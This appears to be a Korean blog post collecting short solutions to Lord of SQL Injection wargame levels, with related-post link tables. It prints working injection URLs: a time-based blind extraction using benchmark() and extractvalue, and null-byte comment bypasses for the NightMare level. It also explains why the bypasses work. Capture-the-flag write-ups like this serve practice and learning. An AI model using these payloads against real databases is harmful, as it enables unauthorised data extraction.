지금 사이트에선 문제이름이 바뀐듯 하지만 맨 마지막 문제
막 flag값이 변하고 임시 테이블 만들고 복잡한 문제지만 sleep() 서브쿼리?였던가 에러를 내서 더이상 테이블에서 flag값을 업데이트 못하게 막은 다음 sleep()가로 안에서 flag값을 비교해서 풀었던걸로 기억한다. 정확한 풀이는 기억이 안남 그럼 20000
| LOS ORC (0) | 2015.09.14 |
|---|---|
| LOS goblin (0) | 2015.09.14 |
| LOS Evil_Wizard (0) | 2015.08.16 |
| LOS NightMare (0) | 2015.08.16 |
| LOS Hell_Fire (0) | 2015.08.16 |
http://leaveret.kr/los/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?limit=1%20procedure%20analyse(extractvalue(1,concat(0x3a,(select%20(if(substr(lpad(bin(ord(substr((select%20pw%20from%20probevilwizard%20limit%201,1),"+str(j)+",1))),8,%270%27),"+str(i)+",1),benchmark(16000000,MD5(CHAR(118))),2))))),1)%23
전 문제랑 똑같음 다만 Time Base 여서 benchmark로 풀어야한다
진우한테 받은 풀이같은데 앞으로 더 갈궈야지 ㅋㅋㅋㅋㅋㅋ
| LOS goblin (0) | 2015.09.14 |
|---|---|
| LOS Rubiya (0) | 2015.08.16 |
| LOS NightMare (0) | 2015.08.16 |
| LOS Hell_Fire (0) | 2015.08.16 |
| LOS Xavis (0) | 2015.08.16 |
http://leaveret.kr/los/nightmare_be1285a95aa20e8fa154cb977c37fee5.php?pw=%27)|0;%00
;%00이 주석처리문자
http://los.sandbox.cash/chall/nightmare_a72d12e4f9c7c341cb6fe36881f7be01.php?pw=%27)=0;%00
사이트가 이전된후론 전 풀이가 먹히지 않는데
| 와 ^ 연산은 안먹히고 =이 먹힌다.
원래는 문자열과 0을 | 이나 ^ 연산 하게되면 참이 되는 점을 이용한 문제인데 여기선 문자열과0 을 참으로 비교해도 참이 되는 점을 이용했다.
| LOS Rubiya (0) | 2015.08.16 |
|---|---|
| LOS Evil_Wizard (0) | 2015.08.16 |
| LOS Hell_Fire (0) | 2015.08.16 |
| LOS Xavis (0) | 2015.08.16 |
| LOS Iron_Golem (0) | 2015.08.16 |